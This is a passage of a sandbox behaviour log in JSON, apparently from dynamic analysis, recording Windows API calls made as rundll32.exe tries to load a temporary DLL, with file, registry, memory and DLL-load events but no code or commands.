16:47:16,279","thread_id":"7476","caller":"0x77a264c6","parentcaller":"0x77a263d1","category":"threading","api":"NtTestAlert","status":true,"return":"0x00000000","arguments":[],"repeated":2,"id":16},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965f1a","parentcaller":"0x00965fdd","category":"process","api":"NtAllocateVirtualMemory","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x00863000"},{"name":"RegionSize","value":"0x00001000"},{"name":"Protection","value":"0x00000004","pretty_value":"PAGE_READWRITE"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":17},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965f1a","parentcaller":"0x00965fdd","category":"process","api":"NtAllocateVirtualMemory","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x00864000"},{"name":"RegionSize","value":"0x00001000"},{"name":"Protection","value":"0x00000004","pretty_value":"PAGE_READWRITE"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":18},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00964168","parentcaller":"0x00966078","category":"process","api":"NtSetInformationProcess","status":true,"return":"0x00000000","arguments":[{"name":"ProcessInformationClass","value":"34","pretty_value":"ProcessExecuteFlags"},{"name":"ProcessInformation","value":"1"}],"repeated":0,"id":19},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x009640d8","parentcaller":"0x009641fe","category":"misc","api":"NtQuerySystemInformation","status":true,"return":"0x00000000","arguments":[{"name":"SystemInformationClass","value":"164"}],"repeated":0,"id":20},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00964290","parentcaller":"0x00966078","category":"process","api":"NtSetInformationProcess","status":true,"return":"0x00000000","arguments":[{"name":"ProcessInformationClass","value":"12"},{"name":"ProcessInformation","value":"\\x00\\x80\\x00\\x00"}],"repeated":0,"id":21},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x009659c5","parentcaller":"0x009642a3","category":"filesystem","api":"NtQueryAttributesFile","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.manifest"}],"repeated":0,"id":22},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"filesystem","api":"NtOpenFile","status":true,"return":"0x00000000","arguments":[{"name":"FileHandle","value":"0x000002a8"},{"name":"DesiredAccess","value":"0x001200a9","pretty_value":"FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":23},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"process","api":"NtCreateSection","status":true,"return":"0x00000000","arguments":[{"name":"SectionHandle","value":"0x000002a4"},{"name":"DesiredAccess","value":"0x00000004","pretty_value":"SECTION_MAP_READ"},{"name":"ObjectAttributes","value":""},{"name":"FileHandle","value":"0x000002a8"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"}],"repeated":0,"id":24},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"process","api":"NtMapViewOfSection","status":true,"return":"0x40000003","arguments":[{"name":"SectionHandle","value":"0x000002a4"},{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x00930000"},{"name":"SectionOffset","value":"0x00000000"},{"name":"ViewSize","value":"0x00010000"},{"name":"Win32Protect","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":25},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"registry","api":"NtOpenKey","status":true,"return":"0x00000000","arguments":[{"name":"KeyHandle","value":"0x000002a0"},{"name":"DesiredAccess","value":"0x00020019","pretty_value":"KEY_READ"},{"name":"ObjectAttributesHandle","value":"0x00000000"},{"name":"ObjectAttributesName","value":"\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"},{"name":"ObjectAttributes","value":"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"}],"repeated":0,"id":26},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"registry","api":"NtQueryValueKey","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"KeyHandle","value":"0x000002a0"},{"name":"ValueName","value":"PreferExternalManifest"},{"name":"FullName","value":"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"}],"repeated":0,"id":27},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a0"}],"repeated":0,"id":28},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"filesystem","api":"NtOpenFile","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"FileHandle","value":"0x00000000"},{"name":"DesiredAccess","value":"0x001200a9","pretty_value":"FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.123.Manifest"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":29},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a8"}],"repeated":0,"id":30},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a4"}],"repeated":0,"id":31},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a1d","parentcaller":"0x009642a3","category":"process","api":"NtUnmapViewOfSection","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x00930000"},{"name":"RegionSize","value":"0x00010000"}],"repeated":0,"id":32},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"filesystem","api":"NtOpenFile","status":true,"return":"0x00000000","arguments":[{"name":"FileHandle","value":"0x000002a4"},{"name":"DesiredAccess","value":"0x001200a9","pretty_value":"FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":33},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"process","api":"NtCreateSection","status":true,"return":"0x00000000","arguments":[{"name":"SectionHandle","value":"0x000002a8"},{"name":"DesiredAccess","value":"0x00000004","pretty_value":"SECTION_MAP_READ"},{"name":"ObjectAttributes","value":""},{"name":"FileHandle","value":"0x000002a4"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"}],"repeated":0,"id":34},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"process","api":"NtMapViewOfSection","status":true,"return":"0x40000003","arguments":[{"name":"SectionHandle","value":"0x000002a8"},{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x00930000"},{"name":"SectionOffset","value":"0x00000000"},{"name":"ViewSize","value":"0x00010000"},{"name":"Win32Protect","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":35},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"registry","api":"NtOpenKey","status":true,"return":"0x00000000","arguments":[{"name":"KeyHandle","value":"0x000002a0"},{"name":"DesiredAccess","value":"0x00020019","pretty_value":"KEY_READ"},{"name":"ObjectAttributesHandle","value":"0x00000000"},{"name":"ObjectAttributesName","value":"\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"},{"name":"ObjectAttributes","value":"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"}],"repeated":0,"id":36},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"registry","api":"NtQueryValueKey","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"KeyHandle","value":"0x000002a0"},{"name":"ValueName","value":"PreferExternalManifest"},{"name":"FullName","value":"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"}],"repeated":0,"id":37},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a0"}],"repeated":0,"id":38},{"timestamp":"2025-11-15 16:47:16,279","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"filesystem","api":"NtOpenFile","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"FileHandle","value":"0x00000000"},{"name":"DesiredAccess","value":"0x001200a9","pretty_value":"FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.124.Manifest"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":39},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a4"}],"repeated":0,"id":40},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a8"}],"repeated":0,"id":41},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a3e","parentcaller":"0x009642a3","category":"process","api":"NtUnmapViewOfSection","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x00930000"},{"name":"RegionSize","value":"0x00010000"}],"repeated":0,"id":42},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"filesystem","api":"NtOpenFile","status":true,"return":"0x00000000","arguments":[{"name":"FileHandle","value":"0x000002a8"},{"name":"DesiredAccess","value":"0x001200a9","pretty_value":"FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":43},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"process","api":"NtCreateSection","status":true,"return":"0x00000000","arguments":[{"name":"SectionHandle","value":"0x000002a4"},{"name":"DesiredAccess","value":"0x00000004","pretty_value":"SECTION_MAP_READ"},{"name":"ObjectAttributes","value":""},{"name":"FileHandle","value":"0x000002a8"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"}],"repeated":0,"id":44},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"process","api":"NtMapViewOfSection","status":true,"return":"0x40000003","arguments":[{"name":"SectionHandle","value":"0x000002a4"},{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x00930000"},{"name":"SectionOffset","value":"0x00000000"},{"name":"ViewSize","value":"0x00010000"},{"name":"Win32Protect","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":45},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"registry","api":"NtOpenKey","status":true,"return":"0x00000000","arguments":[{"name":"KeyHandle","value":"0x000002a0"},{"name":"DesiredAccess","value":"0x00020019","pretty_value":"KEY_READ"},{"name":"ObjectAttributesHandle","value":"0x00000000"},{"name":"ObjectAttributesName","value":"\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"},{"name":"ObjectAttributes","value":"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"}],"repeated":0,"id":46},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"registry","api":"NtQueryValueKey","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"KeyHandle","value":"0x000002a0"},{"name":"ValueName","value":"PreferExternalManifest"},{"name":"FullName","value":"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"}],"repeated":0,"id":47},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a0"}],"repeated":0,"id":48},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"__notification__","api":"sysenter","status":true,"return":"0x00000000","arguments":[{"name":"ThreadIdentifier","value":"3260"},{"name":"Module","value":"KERNEL32.DLL"},{"name":"Return Address","value":"0x76352b4c"}],"repeated":0,"id":49},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a8"}],"repeated":0,"id":50},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a4"}],"repeated":0,"id":51},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965a5f","parentcaller":"0x009642a3","category":"process","api":"NtUnmapViewOfSection","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x00930000"},{"name":"RegionSize","value":"0x00010000"}],"repeated":0,"id":52},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965d94","parentcaller":"0x009642ae","category":"process","api":"NtOpenProcessToken","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"DesiredAccess","value":"0x00000008"},{"name":"TokenHandle","value":"0x000002a4"}],"repeated":0,"id":53},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965d1d","parentcaller":"0x00965db9","category":"process","api":"NtQueryInformationToken","status":true,"return":"0x00000000","arguments":[{"name":"TokenInformationClass","value":"18"},{"name":"TokenInformation","value":"\\x02\\x00\\x00\\x00"}],"repeated":0,"id":54},{"timestamp":"2025-11-15 16:47:16,295","thread_id":"3260","caller":"0x00965dc4","parentcaller":"0x009642ae","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a4"}],"repeated":0,"id":55},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963c8d","parentcaller":"0x00963e97","category":"__notification__","api":"sysenter","status":true,"return":"0x00000000","arguments":[{"name":"ThreadIdentifier","value":"3260"},{"name":"Module","value":"KERNEL32.DLL"},{"name":"Return Address","value":"0x76352b4c"}],"repeated":0,"id":56},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963c8d","parentcaller":"0x00963e97","category":"system","api":"LdrLoadDll","status":false,"return":"0xffffffffc0000135","pretty_return":"DLL_NOT_FOUND","arguments":[{"name":"Flags","value":"0x00000000"},{"name":"FileName","value":"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"},{"name":"BaseAddress","value":"0x00000000"}],"repeated":0,"id":57},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963cf8","parentcaller":"0x00963e97","category":"registry","api":"NtOpenKey","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"KeyHandle","value":"0x00000000"},{"name":"DesiredAccess","value":"0x00020019","pretty_value":"KEY_READ"},{"name":"ObjectAttributesHandle","value":"0x00000000"},{"name":"ObjectAttributesName","value":"\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"},{"name":"ObjectAttributes","value":"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"}],"repeated":0,"id":58},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963cf8","parentcaller":"0x00963e97","category":"filesystem","api":"NtOpenFile","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"FileHandle","value":"0x00000000"},{"name":"DesiredAccess","value":"0x00100001","pretty_value":"FILE_READ_ACCESS|SYNCHRONIZE"},{"name":"FileName","value":"C:\\Windows\\System32\\en-US\\KERNELBASE.dll.mui"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":59},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963cf8","parentcaller":"0x00963e97","category":"filesystem","api":"NtOpenFile","status":true,"return":"0x00000000","arguments":[{"name":"FileHandle","value":"0x000002a4"},{"name":"DesiredAccess","value":"0x00100001","pretty_value":"FILE_READ_ACCESS|SYNCHRONIZE"},{"name":"FileName","value":"C:\\Windows\\sysnative\\en-US\\KERNELBASE.dll.mui"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":60},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963cf8","parentcaller":"0x00963e97","category":"process","api":"NtCreateSection","status":true,"return":"0x00000000","arguments":[{"name":"SectionHandle","value":"0x000002a8"},{"name":"DesiredAccess","value":"0x000f0005","pretty_value":"STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"},{"name":"ObjectAttributes","value":""},{"name":"FileHandle","value":"0x000002a4"},{"name":"FileName","value":"C:\\Windows\\sysnative\\en-US\\KernelBase.dll.mui"}],"repeated":0,"id":61},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963cf8","parentcaller":"0x00963e97","category":"process","api":"NtMapViewOfSection","status":true,"return":"0x00000000","arguments":[{"name":"SectionHandle","value":"0x000002a8"},{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x064d0000"},{"name":"SectionOffset","value":"0x0049ea20"},{"name":"ViewSize","value":"0x00140000"},{"name":"Win32Protect","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":62},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963cf8","parentcaller":"0x00963e97","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a8"}],"repeated":0,"id":63},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963924","parentcaller":"0x00963d10","category":"process","api":"NtUnmapViewOfSection","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x005e0000"},{"name":"RegionSize","value":"0x00001000"}],"repeated":0,"id":64},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963924","parentcaller":"0x00963d10","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000000e8"}],"repeated":0,"id":65},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963924","parentcaller":"0x00963d10","category":"registry","api":"NtOpenKey","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"KeyHandle","value":"0x00000000"},{"name":"DesiredAccess","value":"0x00020019","pretty_value":"KEY_READ"},{"name":"ObjectAttributesHandle","value":"0x00000000"},{"name":"ObjectAttributesName","value":"\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"},{"name":"ObjectAttributes","value":"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\en-US"}],"repeated":0,"id":66},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963924","parentcaller":"0x00963d10","category":"filesystem","api":"NtOpenFile","status":false,"return":"0xffffffffc0000034","pretty_return":"OBJECT_NAME_NOT_FOUND","arguments":[{"name":"FileHandle","value":"0x00000000"},{"name":"DesiredAccess","value":"0x00100001","pretty_value":"FILE_READ_ACCESS|SYNCHRONIZE"},{"name":"FileName","value":"C:\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":67},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963924","parentcaller":"0x00963d10","category":"filesystem","api":"NtOpenFile","status":true,"return":"0x00000000","arguments":[{"name":"FileHandle","value":"0x000000e8"},{"name":"DesiredAccess","value":"0x00100001","pretty_value":"FILE_READ_ACCESS|SYNCHRONIZE"},{"name":"FileName","value":"C:\\Windows\\sysnative\\en-US\\rundll32.exe.mui"},{"name":"ShareAccess","value":"5","pretty_value":"FILE_SHARE_READ|FILE_SHARE_DELETE"}],"repeated":0,"id":68},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963924","parentcaller":"0x00963d10","category":"process","api":"NtCreateSection","status":true,"return":"0x00000000","arguments":[{"name":"SectionHandle","value":"0x000002a8"},{"name":"DesiredAccess","value":"0x000f0005","pretty_value":"STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"},{"name":"ObjectAttributes","value":""},{"name":"FileHandle","value":"0x000000e8"},{"name":"FileName","value":"C:\\Windows\\sysnative\\en-US\\rundll32.exe.mui"}],"repeated":0,"id":69},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963924","parentcaller":"0x00963d10","category":"process","api":"NtMapViewOfSection","status":true,"return":"0x00000000","arguments":[{"name":"SectionHandle","value":"0x000002a8"},{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x005e0000"},{"name":"SectionOffset","value":"0x0049e500"},{"name":"ViewSize","value":"0x00001000"},{"name":"Win32Protect","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":70},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00963924","parentcaller":"0x00963d10","category":"system","api":"NtClose","status":true,"return":"0x00000000","arguments":[{"name":"Handle","value":"0x000002a8"}],"repeated":0,"id":71},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00965e77","parentcaller":"0x009669af","category":"process","api":"NtProtectVirtualMemory","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x0096b000"},{"name":"ModuleName","value":"rundll32.exe"},{"name":"NumberOfBytesProtected","value":"0x00001000"},{"name":"MemoryType","value":"0x00000000"},{"name":"NewAccessProtection","value":"0x00000004","pretty_value":"PAGE_READWRITE"},{"name":"OldAccessProtection","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":72},{"timestamp":"2025-11-15 16:47:16,310","thread_id":"3260","caller":"0x00965e77","parentcaller":"0x009669af","category":"process","api":"NtProtectVirtualMemory","status":true,"return":"0x00000000","arguments":[{"name":"ProcessHandle","value":"0xffffffff"},{"name":"BaseAddress","value":"0x0096b000"},{"name":"ModuleName","value":"rundll32.exe"},{"name":"NumberOfBytesProtected","value":"0x00001000"},{"name":"MemoryType","value":"0x00000000"},{"name":"NewAccessProtection","value":"0x00000002","pretty_value":"PAGE_READONLY"},{"name":"OldAccessProtection","value":"0x00000004","pretty_value":"PAGE_READWRITE"},{"name":"StackPivoted","value":"no"}],"repeated":0,"id":73},{"timestamp":"2025-11-15 16:47:16,326","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"__notification__","api":"sysenter","status":true,"return":"0x00000000","arguments":[{"name":"ThreadIdentifier","value":"3260"},{"name":"Module","value":"KERNELBASE.dll"},{"name":"Return Address","value":"0x7607413c"}],"repeated":0,"id":74},{"timestamp":"2025-11-15 16:47:16,482","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\SYSTEM32\\TextShaping"},{"name":"DllBase","value":"0x730a0000"}],"repeated":0,"id":75},{"timestamp":"2025-11-15 16:47:16,498","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\system32\\uxtheme"},{"name":"DllBase","value":"0x73ae0000"}],"repeated":0,"id":76},{"timestamp":"2025-11-15 16:47:16,513","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"LdrLoadDll","status":true,"return":"0x00000000","arguments":[{"name":"Flags","value":"0x00000000"},{"name":"FileName","value":"C:\\Windows\\System32\\uxtheme.dll"},{"name":"BaseAddress","value":"0x73ae0000"}],"repeated":0,"id":77},{"timestamp":"2025-11-15 16:47:16,513","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\System32\\MSCTF"},{"name":"DllBase","value":"0x76620000"}],"repeated":0,"id":78},{"timestamp":"2025-11-15 16:47:16,529","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\SYSTEM32\\kernel.appcore"},{"name":"DllBase","value":"0x74e50000"}],"repeated":0,"id":79},{"timestamp":"2025-11-15 16:47:16,576","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\System32\\bcryptPrimitives"},{"name":"DllBase","value":"0x75e60000"}],"repeated":0,"id":80},{"timestamp":"2025-11-15 16:47:16,576","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\SYSTEM32\\ntmarta"},{"name":"DllBase","value":"0x73f80000"}],"repeated":0,"id":81},{"timestamp":"2025-11-15 16:47:16,576","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\System32\\CoreMessaging"},{"name":"DllBase","value":"0x71e40000"}],"repeated":0,"id":82},{"timestamp":"2025-11-15 16:47:16,576","thread_id":"3260","caller":"0x00963a40","parentcaller":"0x00963d10","category":"system","api":"DllLoadNotification","status":true,"return":"0x00000000","arguments":[{"name":"NotificationReason","value":"load"},{"name":"DllName","value":"C:\\Windows\\SYSTEM32\\wintypes"},{"name":"DllBase","value":"0x72eb0000"}],"repeated":0,"id":83},{"timestamp":"2025-11-15 